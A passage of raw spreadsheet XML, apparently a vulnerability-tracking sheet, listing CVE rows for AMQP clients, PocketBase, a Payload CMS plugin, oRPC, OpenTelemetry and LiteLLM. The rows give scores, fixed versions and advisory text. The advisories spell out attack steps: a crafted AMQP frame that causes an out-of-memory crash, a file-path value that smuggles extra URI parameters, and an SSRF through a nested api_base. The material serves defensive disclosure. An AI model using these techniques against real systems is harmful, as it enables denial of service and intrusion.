      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr"/>
      <c r="P1073" s="5" t="inlineStr"/>
      <c r="Q1073" s="5" t="inlineStr"/>
      <c r="R1073" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S1073" s="5" t="inlineStr">
        <is>
          <t>## Vulnerability
In `AMQConnection.java` (line 435-436), after `Connection.Tune` negotiation, the frame-max limit is set via:
```java
_frameHandler.setFrameMax(
    Math.min(this.maxInboundMessageBodySize, frameMax));
```
When `frameMax = 0` (meaning "unlimited" per AMQP spec), `Math.min(67108864, 0) = 0`. This value is then passed to `Utils.framePayloadLimit(0)` which returns `Integer.MAX_VALUE` (line 77-79 of Utils.java):
```java
static int framePayloadLimit(int frameMax) {
    if (frameMax &lt;= 0) {
      return Integer.MAX_VALUE;
    }
    // ...
}
```
This completely defeats the `maxInboundMessageBodySize` protection (default 64MB) at the frame level.
## Attack Scenario
A malicious AMQP server (or MITM) sends `Connection.Tune` with `frameMax=0`:
1. Client defaults: `requestedFrameMax = 0` (`ConnectionFactory.DEFAULT_FRAME_MAX`, line 82)
2. `negotiatedMaxValue(0, 0)` = `Math.max(0, 0)` = 0 (line 673-676)
3. `Math.min(maxInboundMessageBodySize, 0)` = 0 — **64MB cap defeated**
4. `framePayloadLimit(0)` = `Integer.MAX_VALUE` — no frame size enforcement
5. Attacker sends a single frame with `frameSize = 0x1FFFFFFF` (~500MB)
6. `Frame.readFrom()` (line 135) executes `new byte[frameSize]` — **OOM crash**
The frame does not need to be a body frame — method frames, header frames, or heartbeat frames with a crafted size field all trigger the allocation before any content-level check fires.
## Root Cause
The AMQP spec uses `frameMax=0` to mean "unlimited", but `Math.min` treats it as the integer value zero. The intent of line 435-436 was to take the smaller of the two limits, but when one limit uses 0-means-unlimited semantics, `Math.min` always selects the zero, disabling the other limit.
## Impact
- **Default configuration is vulnerable**: Both `requestedFrameMax` (client) and legitimate servers' `frameMax` in Tune may be 0
- **Single-frame OOM**: One malicious frame triggers up to ~2GB allocation (`Integer.MAX_VALUE` bytes)
- **Bypasses existing protection**: `maxInboundMessageBodySize` (introduced to cap allocations at 64MB) is entirely defeated at the frame level
- **Different from ValueReader OOM**: This is a frame-layer allocation in `Frame.readFrom()`, not a value-layer allocation in `ValueReader.readBytes()`
## Affected Code
- `AMQConnection.java:435-436` — `Math.min` with 0-means-unlimited
- `Utils.java:77-79` — `framePayloadLimit(0)` returns `Integer.MAX_VALUE`
- `Frame.java:135` — `new byte[frameSize]` allocation site
- `ConnectionFactory.java:82` — `DEFAULT_FRAME_MAX = 0`
## Suggested Fix
```java
int effectiveFrameMax = (frameMax == 0)
    ? this.maxInboundMessageBodySize
    : Math.min(this.maxInboundMessageBodySize, frameMax);
_frameHandler.setFrameMax(effectiveFrameMax);
```
This treats `frameMax=0` as "use maxInboundMessageBodySize as the cap" instead of "zero".</t>
        </is>
      </c>
      <c r="T1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75516</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77404</t>
        </is>
      </c>
      <c r="D1074" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1074" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="inlineStr"/>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr"/>
      <c r="L1074" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1074" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr"/>
      <c r="P1074" s="5" t="inlineStr"/>
      <c r="Q1074" s="5" t="inlineStr"/>
      <c r="R1074" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="S1074" s="5" t="inlineStr">
        <is>
          <t>## Summary
A query parameter injection vulnerability exists in the AMQP client's connection URI formatting logic. When generating or parsing connection URIs, TLS-related filesystem paths (such as certificates or keys) are appended directly to the URI's query string using string concatenation rather than secure URL encoding via functions like `url.QueryEscape`.
If an application handles a TLS file path containing special character delimiters (such as `&amp;` or `=`), these characters are interpreted as parameter separators by the URI parser. If the resulting `URI.String()` output is subsequently re-parsed via `ParseURI`, the injected fields can silently overwrite or hijack critical configuration parameters, forcing the client to use arbitrary connection settings or alternate TLS files.
---
## Vulnerability Details
### Mechanism
The vulnerability lies within the lack of proper escaping when compiling connection string components into a raw URL format:
```go
// Example of insecure string concatenation during URI building
uri := fmt.Sprintf("amqps://user:pass@host/%s?certfile=%s&amp;keyfile=%s", vhost, certPath, keyPath)
```
Because `certPath` and `keyPath` are not passed through `url.QueryEscape`, special URL characters preserve their control meanings. For instance, if a user supply a certificate path named:
`/tmp/cert=foo&amp;keyfile=/evil/path`
The generated string translates into:
`...?certfile=/tmp/cert=foo&amp;keyfile=/evil/path&amp;keyfile=/original/path`
When this string passes back through `ParseURI` (common in connection re-dial routines or configuration replication steps), standard URL parsing mechanics treat the string as multiple distinct parameters. Depending on map assignment order inside the parser, the injected keys take precedence over the original parameters.
### Impact
By manipulating the file paths used for TLS assets, an attacker or compromised local sub-system can:
* Inject arbitrary alternative options or override protocol settings.
* Substitute or switch keyfiles, leading to connection failures or the parsing of unauthorized cryptographic assets.
* Corrupt connection state variables, triggering application-layer failures during connection setup or recovery.
---
## Attack Vector
An attacker who has partial control over directory naming conventions or environmental variables used to specify local infrastructure paths can execute a parameter injection attack:
1. **Path Creation:** An attacker sets up a path containing deliberate URL parameter delimiters (e.g., `/var/lib/certs/client.crt?cacertfile=/tmp/fake_ca.crt&amp;`).
2. **String Generation:** The application serializes the active connection state or passes the paths down to an unescaped URI builder function.
3. **Configuration Hijack:** The URI string is generated with the injected parameter embedded into the query structure. When the client attempts to reuse or re-parse this connection string during a connection retry or worker spin-up, it parses the injected `cacertfile` parameter, loading a different, unverified Certificate Authority string.</t>
        </is>
      </c>
      <c r="T1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77404</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82410</t>
        </is>
      </c>
      <c r="D1075" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E1075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1075" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="inlineStr"/>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr"/>
      <c r="L1075" s="5" t="inlineStr">
        <is>
          <t>go:github.com/pocketbase/pocketbase</t>
        </is>
      </c>
      <c r="M1075" s="5" t="inlineStr">
        <is>
          <t>0.22.48, 0.39.7</t>
        </is>
      </c>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr"/>
      <c r="P1075" s="5" t="inlineStr"/>
      <c r="Q1075" s="5" t="inlineStr"/>
      <c r="R1075" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="S1075" s="5" t="inlineStr">
        <is>
          <t>PocketBase already has builtin panic-recover middleware for the regular requests handling but it doesn't cover panics in internal child/worker goroutines which in some situations could cause termination of the server process.
To prevent this from hapenning all existing internal worker functions were wrapped with the new helper `routine.SafeWrap(f)` _(auto recovers and returns any eventual panic as regular error)_.
The vulnerability was reported by @gigioneggiando and it is strongly recommended to upgrade to PocketBase **[v0.39.7](https://github.com/pocketbase/pocketbase/releases/tag/v0.39.7)** _(the fix was also backported in [v0.22.48](https://github.com/pocketbase/pocketbase/releases/tag/v0.22.48) in case you are using older PocketBase &lt; v0.23.0)_.</t>
        </is>
      </c>
      <c r="T1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82410</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77406</t>
        </is>
      </c>
      <c r="D1076" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1076" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="inlineStr"/>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr"/>
      <c r="L1076" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1076" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr"/>
      <c r="P1076" s="5" t="inlineStr"/>
      <c r="Q1076" s="5" t="inlineStr"/>
      <c r="R1076" s="5" t="inlineStr">
        <is>
          <t>CWE-195</t>
        </is>
      </c>
      <c r="S1076" s="5" t="inlineStr">
        <is>
          <t>## Summary
A logic and resource exhaustion vulnerability exists in the AMQP client's Quality of Service (`Qos`) configuration method. The `Qos` function accepts signed integers (`int`) for the `prefetchCount` and `prefetchSize` parameters but casts them directly to unsigned integers (`uint16` and `uint32`, respectively) when formatting the wire-level frame.
If a developer passes a negative integer (such as `-1`) to these parameters—frequently intended as a sentinel value meaning "no change" or "no limit"—the application performs an implicit signed-to-unsigned conversion. This wraps the values to their absolute maximum limit ($65535$ and $4294967295$). Consequently, a consumer expecting restricted message delivery rates is suddenly flooded with an unlimited volume of messages, potentially exhausting memory resources and crashing the application.
---
## Vulnerability Details
### Mechanism
The bug manifests during the structural assignment inside the channel's `Qos` method:
```go
// channel.go:795-796
PrefetchCount: uint16(prefetchCount),  // -1 wraps to 65535
PrefetchSize:  uint32(prefetchSize),   // -1 wraps to 4294967295
```
In Go, converting a negative signed integer to an unsigned integer shifts the value via two's complement arithmetic. Because no boundary validation or signedness check occurs prior to the cast:
* Passing `-1` for `prefetchCount` yields a wire value of `65535`.
* Passing `-1` for `prefetchSize` yields a wire value of `4294967295`.
### Impact
The AMQP broker interprets a `prefetch-count` of `65535` as an instruction to dispatch messages to the consumer with virtually no concurrency limits. 
If the application is processing heavy payloads or relies on strict rate-limiting to maintain stability, this unexpected flood will cause rapid heap memory growth, unmanageable processing queues, and an eventual Out-Of-Memory (OOM) termination.
---
## Attack Vector
An attacker who can manipulate configuration files, environmental variables, or API inputs that dictate client Qos settings can trigger an application-layer Denial of Service:
1. **Malicious Input:** An attacker sets a service's prefetch configuration parameter to `-1`.
2. **Implicit Overflow:** The application initializes the channel, executes `Qos(-1, ...)`, and transmits an unintended maximum-capacity request to the RabbitMQ/AMQP broker.
3. **Consumer Exhaustion:** The broker flushes the entire contents of the queue directly into the client consumer's network buffer, bypassing expected application concurrency barriers and inducing a crash.</t>
        </is>
      </c>
      <c r="T1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77406</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59965</t>
        </is>
      </c>
      <c r="D1077" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1077" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr"/>
      <c r="L1077" s="5" t="inlineStr"/>
      <c r="M1077" s="5" t="inlineStr"/>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1077" s="5" t="inlineStr"/>
      <c r="R1077" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S1077" s="5" t="inlineStr">
        <is>
          <t>Payload Plugins is a collection of plugins designed to enhance Payload CMS. In 0.7.0, @jhb.software/payload-alt-text-plugin exposes POST /api/alt-text-plugin/generate and POST /api/alt-text-plugin/bulk with a default guard that accepts any authenticated user, while alt-text/src/endpoints/generateAltText.ts and alt-text/src/endpoints/bulkGenerateAltTexts.ts call req.payload.findByID and req.payload.update without overrideAccess: false. Payload therefore defaults overrideAccess to true and skips the target collection's read and update access functions. An authenticated low-privilege user can supply id, collection, locale, and update values to read arbitrary protected upload documents and overwrite their alt and keywords fields, even when the collection permits those operations only to administrators. A control Local API call with overrideAccess: false is denied, confirming that the plugin endpoint bypasses otherwise effective collection rules. This vulnerability is fixed in 0.8.0.</t>
        </is>
      </c>
      <c r="T1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59965</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77407</t>
        </is>
      </c>
      <c r="D1078" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1078" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="inlineStr"/>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr"/>
      <c r="L1078" s="5" t="inlineStr">
        <is>
          <t>go:github.com/rabbitmq/amqp091-go</t>
        </is>
      </c>
      <c r="M1078" s="5" t="inlineStr">
        <is>
          <t>1.13.0</t>
        </is>
      </c>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr"/>
      <c r="P1078" s="5" t="inlineStr"/>
      <c r="Q1078" s="5" t="inlineStr"/>
      <c r="R1078" s="5" t="inlineStr">
        <is>
          <t>CWE-316</t>
        </is>
      </c>
      <c r="S1078" s="5" t="inlineStr">
        <is>
          <t>## Summary
An information disclosure vulnerability exists in the AMQP client implementation's authentication handling configuration. Following a successful connection handshake, the `Connection.Config.SASL` field stores the `Authentication` implementation state used to establish the session. 
For standard `PLAIN` authentication, this state utilizes the `PlainAuth` struct, which defines both `Username` and `Password` as publicly exported, plaintext string fields. Because this sensitive data is retained permanently in-memory within an exported field structure, any peripheral code, internal package, reflective logger, dependency, or automated debugging utility with access to the core `*Connection` object can read and expose the raw credentials.
---
## Vulnerability Details
### Mechanism
The vulnerability stems from the structural design of the configuration storage used during and after the AMQP handshake:
```go
// auth.go:21-23
type PlainAuth struct {
    Username string
    Password string  // exported plaintext
}
```
When an application initializes a connection, the `PlainAuth` object is deeply nested inside the configuration structure (`Connection.Config`). Even after the handshake concludes and authentication is complete, this structure persists natively in-memory for the duration of the network connection's lifecycle. 
Because `Password` is an exported string field, standard automated inspection mechanisms can read its value without restriction.
### Affected Code Paths &amp; Integrations
Any sub-component or library that traverses or reads the `*Connection` object will inadvertently read the plaintext password, including:
* **Reflective Loggers:** Structured logging frameworks that serialize nested configuration structs into JSON/Log formats.
* **APM &amp; Performance Agents:** Automated telemetry or Application Performance Monitoring tools that capture state snapshots.
* **Debugging &amp; Panic Handlers:** Mid-tier software or dump libraries designed to capture goroutine state or print deep struct hierarchies upon program errors or signals.
### Impact
The credential remains vulnerable to leak paths into logging pipelines, log aggregators, security information and event management (SIEM) systems, or standard output. Once transmitted to external log infrastructure, these credentials become accessible to unprivileged operators or any actor with access to log archives.
---
## Attack Vector
An attacker does not necessarily need direct remote code execution to exploit this flaw; instead, the vulnerability acts as a credential harvesting vector inside multi-tenant environments or via secondary log exposure:
1. **Configuration Dump:** An operator configures a standard reflective logger or third-party APM package to capture system state parameters, including the active AMQP `*Connection` object.
2. **Reflective Access:** The inspection engine uses Go's `reflect` package to walk the structural hierarchy, pulling the string value from `Connection.Config.SASL.(*PlainAuth).Password`.
3. **Exfiltration:** The plaintext password is written to standard system logs, which are then scraped into shared logging aggregators, exposing production infrastructure credentials to a wider audience.</t>
        </is>
      </c>
      <c r="T1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77407</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77360</t>
        </is>
      </c>
      <c r="D1079" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E1079" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1079" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="inlineStr"/>
      <c r="I1079" s="5" t="inlineStr"/>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr"/>
      <c r="L1079" s="5" t="inlineStr">
        <is>
          <t>npm:@orpc/server</t>
        </is>
      </c>
      <c r="M1079" s="5" t="inlineStr">
        <is>
          <t>1.14.8</t>
        </is>
      </c>
      <c r="N1079" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1079" s="5" t="inlineStr"/>
      <c r="P1079" s="5" t="inlineStr"/>
      <c r="Q1079" s="5" t="inlineStr"/>
      <c r="R1079" s="5" t="inlineStr">
        <is>
          <t>CWE-113</t>
        </is>
      </c>
      <c r="S1079" s="5" t="inlineStr">
        <is>
          <t>### Summary
A flaw in the CORS plugin allowed the incoming request's `Vary` header to be reflected into the response, letting a client influence a header that should be controlled solely by the server.
### Details
The CORS plugin previously copied the request's `Vary` header directly onto the response instead of treating `Vary` as a response-only header. Because `Vary` tells downstream caches and proxies how to key their cached responses, this allowed a client to inject arbitrary values into the response's `Vary` header, potentially distorting cache-key behavior in shared caches/CDNs sitting in front of an oRPC server and leading to inconsistent CORS enforcement for other clients.
Practical impact is limited to deployments where a shared cache or reverse proxy keys on the `Vary` header; the real-world effect depends on the caching layer's configuration.
### Impact
May cause cache key pollution and inconsistent CORS enforcement in setups that rely on shared/edge caches keying on `Vary`. No direct confidentiality, integrity, or availability impact in default (non-cached) configurations.
### Resolution
Update `@orpc/server` (and any other `@orpc/*` packages bundling the CORS plugin) to `1.14.8`. The CORS plugin now derives `Vary` exclusively from the response, appending `Origin` and preserving existing values instead of reflecting request headers.</t>
        </is>
      </c>
      <c r="T1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77360</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D1080" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E1080" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1080" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="inlineStr"/>
      <c r="I1080" s="5" t="inlineStr"/>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr"/>
      <c r="L1080" s="5" t="inlineStr">
        <is>
          <t>go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M1080" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N1080" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1080" s="5" t="inlineStr"/>
      <c r="P1080" s="5" t="inlineStr"/>
      <c r="Q1080" s="5" t="inlineStr"/>
      <c r="R1080" s="5" t="inlineStr">
        <is>
          <t>CWE-295, CWE-923</t>
        </is>
      </c>
      <c r="S1080" s="5" t="inlineStr">
        <is>
          <t>### Summary
The OTLP log gRPC exporter loads TLS settings from environment variables but does not apply them when creating gRPC transport credentials. Operators who rely on `OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE`, `OTEL_EXPORTER_OTLP_CERTIFICATE`, or related client certificate variables for CA pinning or mTLS get a connection that falls back to system roots and omits the env-supplied client certificate. A network attacker who can intercept or spoof the collector connection with a system-trusted certificate can read or alter log telemetry. 
Introduced in commit: d99c76f
### Details
The affected code is in `exporters/otlp/otlplog/otlploggrpc`.
`newConfig` resolves env-based TLS configuration into `cfg.tlsCfg` at `exporters/otlp/otlplog/otlploggrpc/config.go:106-116`. The finding also identifies `loadEnvTLS` at `config.go:451-492` as the code that builds a `*tls.Config` containing `RootCAs` and client certificates from `OTEL_EXPORTER_OTLP[_LOGS]_CERTIFICATE` and `OTEL_EXPORTER_OTLP[_LOGS]_CLIENT_CERTIFICATE`/`KEY`.
However, `newGRPCDialOptions` in `exporters/otlp/otlplog/otlploggrpc/client.go:83-92` only checks `cfg.gRPCCredentials` and `cfg.insecure`. When neither is set, which is the normal env-only TLS configuration path, it uses `credentials.NewTLS(nil)`. That default trusts the host system root CAs and contains no env-supplied client certificate. The finding evidence reports no other `tlsCfg` use in the package, so env-based CA pinning and mTLS settings are loaded but not enforced.
### PoC
[validation-artifact.zip](https://github.com/user-attachments/files/27493589/validation-artifact.zip)
The validation artifact contains a ready-to-run test at `validation-artifact.zip:./poc_env_tls_ignored_test.go` and brief instructions at `validation-artifact.zip:./README.md`.
From a checkout of `pellared/opentelemetry-go` at commit `d99c76f`, with Go module dependencies available:
```sh
FINDING_DIR=/path/to/02-e6e2897a969c8191b260f243fbc99ebd-log-grpc-exporter-ignores-env-tls-certs-bypassing-mtls-pinning
cd /path/to/opentelemetry-go
git checkout d99c76f
tar -xOf validation-artifact.tar ./poc_env_tls_ignored_test.go &gt; exporters/otlp/otlplog/otlploggrpc/poc_env_tls_ignored_test.go
cd exporters/otlp/otlplog/otlploggrpc
GO111MODULE=on go test -v -run TestEnvTLSIgnored -count=1
```
The test generates a private CA and a TLS gRPC logs server certificate signed by that CA. It sets:
```sh
OTEL_EXPORTER_OTLP_LOGS_ENDPOINT=https://127.0.0.1:&lt;test-port&gt;
OTEL_EXPORTER_OTLP_LOGS_CERTIFICATE=&lt;temp-dir&gt;/ca.pem
```
Expected output includes an `unknown authority` failure for the first export call even though the env certificate points to the server CA, followed by a passing test after the same `cfg.tlsCfg` is explicitly wired through `WithTLSCredentials`:
```text
=== RUN   TestEnvTLSIgnored
    poc_env_tls_ignored_test.go:...: export error (expected due to ignored tlsCfg): ... x509: certificate signed by unknown authority
--- PASS: TestEnvTLSIgnored
PASS
```
This demonstrates that the env CA is parsed into `cfg.tlsCfg` but ignored by the default gRPC dial path.
### Impact
This is improper TLS certificate validation and endpoint authentication caused by ignoring configured trust material. Users of the OTLP log gRPC exporter who configure TLS, CA pinning, or mTLS through environment variables are impacted when they do not also supply explicit `WithTLSCredentials`. TLS still occurs with system roots, but the intended private CA pinning and client certificate authentication are bypassed. An attacker with a suitable network position and a system-trusted certificate for the collector endpoint can intercept or tamper with log telemetry that operators expected to be protected by the configured CA or mTLS policy.</t>
        </is>
      </c>
      <c r="T1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59823</t>
        </is>
      </c>
      <c r="D1081" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E1081" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1081" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="inlineStr"/>
      <c r="I1081" s="5" t="inlineStr"/>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr"/>
      <c r="L1081" s="5" t="inlineStr">
        <is>
          <t>pip:litellm</t>
        </is>
      </c>
      <c r="M1081" s="5" t="inlineStr">
        <is>
          <t>1.83.9</t>
        </is>
      </c>
      <c r="N1081" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O1081" s="5" t="inlineStr"/>
      <c r="P1081" s="5" t="inlineStr"/>
      <c r="Q1081" s="5" t="inlineStr"/>
      <c r="R1081" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S1081" s="5" t="inlineStr">
        <is>
          <t>### Summary
A server-side request forgery in LiteLLM Proxy lets an authenticated caller redirect the
proxy's outbound request to a host of their choosing by smuggling an `api_base` inside the
`user_config` request body, bypassing the existing parameter guard.
### Details
LiteLLM Proxy validates request bodies with `is_request_body_safe`, which blocks the
`api_base` and `base_url` parameters but does not cover `user_config`. The `user_config`
object is used to build the outbound router for a request, so a caller can place an
`api_base` inside it and reach an arbitrary host. The guard only inspected the two
top-level keys, so the same `api_base` nested inside `user_config` was never checked.
Exploitation requires a valid virtual key.
### Impact
An authenticated caller can make the proxy issue server-side requests to internal or
external hosts of their choosing, reaching endpoints the caller cannot otherwise access.
### Affected / Patched
Affected: `&lt;= 1.83.8`
Patched: `1.83.9`
### Remediation
Upgrade to 1.83.9 or later (released 2026-04-17).</t>
        </is>
      </c>
      <c r="T1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59823</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81870</t>
        </is>
      </c>
      <c r="D1082" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E1082" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1082" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="inlineStr"/>
      <c r="I1082" s="5" t="inlineStr"/>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr"/>
      <c r="L1082" s="5" t="inlineStr">
        <is>
          <t>go:go.opentelemetry.io/otel/exporters/otlp/otlptrace, go:go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc, go:go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp, go:go.opentelemetry.io/otel/exporters/zipkin, go:go.opentelemetry.io/otel/sdk</t>
        </is>
      </c>
